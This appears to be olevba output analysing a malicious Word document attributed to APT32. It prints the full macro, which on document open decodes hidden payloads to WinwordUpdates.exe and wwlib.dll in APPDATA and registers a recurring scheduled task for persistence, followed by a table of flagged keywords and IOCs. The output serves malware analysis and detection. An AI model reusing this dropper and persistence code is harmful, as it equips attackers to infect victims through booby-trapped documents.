APT32 docs vba

1. olevba 0.53.1 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. MHT:MASIHB-- d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
5. ===============================================================================
6. FILE: d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
7. Type: MHTML
8. -------------------------------------------------------------------------------
9. VBA MACRO ThisDocument.cls
10. in file: None - OLE stream: u'VBA/ThisDocument'
11. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
12. Private Sub Document_Open()
13.     Dim sAppData As String
14.     sAppData = Environ("APPDATA")
15.     sAppData = sAppData & "\WinwordUpdates.exe"
16.     Dim sAppData1 As String
17.     sAppData1 = Environ("APPDATA")
18.     sAppData1 = sAppData1 & "\wwlib.dll"
19.    
20.     Dim b As String
21.     Dim a As String
22.     Dim tableNew As Table
23.     Set tableNew = ActiveDocument.Tables(1)
24.     a = tableNew.Cell(1, 1).Range.Text
25.     a = Left(a, Len(a) - 2)
26.     b = Base64Decode(a)
27.     Dim fso As Object
28.     Set fso = CreateObject("Scripting.FileSystemObject")
29.     Dim oFile As Object
30.     Set oFile = fso.CreateTextFile(sAppData)
31.     oFile.Write b
32.     oFile.Close
33.    
34.     Dim c As String
35.     Dim d As String
36.     c = tableNew.Cell(1, 2).Range.Text
37.     c = Left(c, Len(c) - 2)
38.     d = Base64Decode(c)
39.     Dim fso1 As Object
40.     Set fso1 = CreateObject("Scripting.FileSystemObject")
41.     Dim oFile1 As Object
42.     Set oFile1 = fso1.CreateTextFile(sAppData1)
43.     oFile1.Write d
44.     oFile1.Close
45.    
46.     yiBhyERIualWRmBjcsIbCZLq
47.     Set fso = Nothing
48.     Set oFile = Nothing
49.     Set fso1 = Nothing
50.     Set oFile1 = Nothing
51. End Sub
52.  
53. Function Base64Decode(ByVal base64String) As String
54.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
55.   Dim dataLength, sOut, groupBegin
56.  
57.   base64String = Replace(base64String, vbCrLf, "")
58.   base64String = Replace(base64String, vbTab, "")
59.   base64String = Replace(base64String, " ", "")
60.  
61.   dataLength = Len(base64String)
62.   If dataLength Mod 4 <> 0 Then
63.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
64.     Exit Function
65.   End If
66.  
67.   For groupBegin = 1 To dataLength Step 4
68.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
69.     numDataBytes = 3
70.     nGroup = 0
71.  
72.     For CharCounter = 0 To 3
73.  
74.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
75.  
76.       If thisChar = "=" Then
77.         numDataBytes = numDataBytes - 1
78.         thisData = 0
79.       Else
80.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
81.       End If
82.       If thisData = -1 Then
83.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
84.         Exit Function
85.       End If
86.  
87.       nGroup = 64 * nGroup + thisData
88.     Next
89.  
90.     nGroup = Hex(nGroup)
91.  
92.     nGroup = String(6 - Len(nGroup), "0") & nGroup
93.  
94.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
95.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
96.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
97.    
98.     sOut = sOut & Left(pOut, numDataBytes)
99.   Next
100.  
101.   Base64Decode = sOut
102. End Function
103.  
104. Function yiBhyERIualWRmBjcsIbCZLq()
105.     Dim sAppData As String
106.     sAppData = Environ("APPDATA")
107.     sAppData = sAppData & "\WinwordUpdates.exe"
108.     Const TriggerTypeTime = 1
109.     Const ActionTypeExec = 0
110.     Set service = CreateObject("Schedule.Service")
111.     Call service.Connect
112.     Dim rootFolder
113.     Set rootFolder = service.GetFolder("\")
114.     Dim taskDefinition
115.     Set taskDefinition = service.NewTask(0)
116.     Dim principal
117.     Set principal = taskDefinition.principal
118.     principal.LogonType = 3
119.     Dim settings
120.     Set settings = taskDefinition.settings
121.     settings.Enabled = True
122.     settings.StartWhenAvailable = True
123.     settings.Hidden = False
124.     Dim triggers
125.     Set triggers = taskDefinition.triggers
126.     Dim trigger
127.     Set trigger = triggers.Create(TriggerTypeTime)
128.     Dim startTime, endTime
129.     Dim time
130.     time = DateAdd("s", 30, Now)
131.     startTime = XmlTime(time)
132.     trigger.StartBoundary = startTime
133.     trigger.Enabled = True
134.     Dim Repetition
135.     Set Repetition = trigger.Repetition
136.     Repetition.Interval = "PT" & "5" & "M"
137.     Dim Action
138.     Set Action = taskDefinition.Actions.Create(ActionTypeExec)
139.     Action.Path = sAppData
140.     Action.Arguments = ""
141.     Call rootFolder.RegisterTaskDefinition("WinwordUpdates", taskDefinition, 6, , , 3)
142. End Function
143. Function XmlTime(t)
144.     Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
145.     Dim tTime, tDate
146.     cSecond = "0" & Second(t)
147.     cMinute = "0" & Minute(t)
148.     CHour = "0" & Hour(t)
149.     cDay = "0" & Day(t)
150.     cMonth = "0" & Month(t)
151.     cYear = Year(t)
152.     tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
153.         ":" & Right(cSecond, 2)
154.     tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
155.     XmlTime = tDate & "T" & tTime
156. End Function
157.  
158.  
159.  
160.  
161.  
162.  
163.  
164.  
165.  
166.  
167.  
168.  
169.  
170.  
171.  
172. +------------+--------------------+-----------------------------------------+
173. | Type       | Keyword            | Description                             |
174. +------------+--------------------+-----------------------------------------+
175. | AutoExec   | Document_Open      | Runs when the Word or Publisher         |
176. |            |                    | document is opened                      |
177. | Suspicious | Chr                | May attempt to obfuscate specific       |
178. |            |                    | strings (use option --deobf to          |
179. |            |                    | deobfuscate)                            |
180. | Suspicious | CreateObject       | May create an OLE object                |
181. | Suspicious | CreateTextFile     | May create a text file                  |
182. | Suspicious | Environ            | May read system environment variables   |
183. | Suspicious | Write              | May write to a file (if combined with   |
184. |            |                    | Open)                                   |
185. | Suspicious | Hex Strings        | Hex-encoded strings were detected, may  |
186. |            |                    | be used to obfuscate strings (option    |
187. |            |                    | --decode to see all)                    |
188. | Suspicious | Base64 Strings     | Base64-encoded strings were detected,   |
189. |            |                    | may be used to obfuscate strings        |
190. |            |                    | (option --decode to see all)            |
191. | IOC        | WinwordUpdates.exe | Executable file name                    |
192. | IOC        | wwlib.dll          | Executable file name                    |
193. +------------+--------------------+-----------------------------------------+